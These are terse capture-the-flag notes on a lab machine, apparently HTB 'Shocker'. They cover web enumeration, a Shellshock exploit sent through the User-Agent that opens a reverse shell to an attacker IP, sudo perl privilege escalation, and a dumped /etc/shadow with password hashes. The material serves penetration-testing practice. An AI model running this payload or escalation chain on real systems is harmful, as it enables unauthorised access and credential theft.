10.10.10.56

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))

Searchsploit - nothing of interest

Page 
don't bug me!
/bug.jpg


Nikto - nothing of interest

Gobuster 
/server-status        (Status: 403) [Size: 299]

drib
---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)                                                                     
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)                                                                   
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)  

Dirbuster
Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 403
File found: /cgi-bin/user.sh - 200
Dir found: /icons/small/ - 403

Nma script scan
└─$ sudo nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56 
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271



Burp
GET /cgi-bin/user.sh HTTP/1.1
Host: shocker.htb
User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo; /bin/bash -i >& /dev/tcp/10.10.14.9/1234 0>&1


RS
nc -lvnp1234


Shell


cat user.txt


python3 -c 'import pty; pty.spawn("/bin/bash")'
shelly@Shocker:/tmp$ sudo -l


User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl


shelly@Shocker:/tmp$ sudo perl -e 'exec "/bin/sh";'

cat root.txt


cat /etc/shadow


root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::
daemon:*:17001:0:99999:7:::
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::
man:*:17001:0:99999:7:::
lp:*:17001:0:99999:7:::
mail:*:17001:0:99999:7:::
news:*:17001:0:99999:7:::
uucp:*:17001:0:99999:7:::
proxy:*:17001:0:99999:7:::
www-data:*:17001:0:99999:7:::
backup:*:17001:0:99999:7:::
list:*:17001:0:99999:7:::
irc:*:17001:0:99999:7:::
gnats:*:17001:0:99999:7:::
nobody:*:17001:0:99999:7:::
systemd-timesync:*:17001:0:99999:7:::
systemd-network:*:17001:0:99999:7:::
systemd-resolve:*:17001:0:99999:7:::
systemd-bus-proxy:*:17001:0:99999:7:::
syslog:*:17001:0:99999:7:::
_apt:*:17001:0:99999:7:::
lxd:*:17431:0:99999:7:::
messagebus:*:17431:0:99999:7:::
uuidd:*:17431:0:99999:7:::
dnsmasq:*:17431:0:99999:7:::
sshd:*:17431:0:99999:7:::
shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::




2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

Searchsploit - nothing of interest
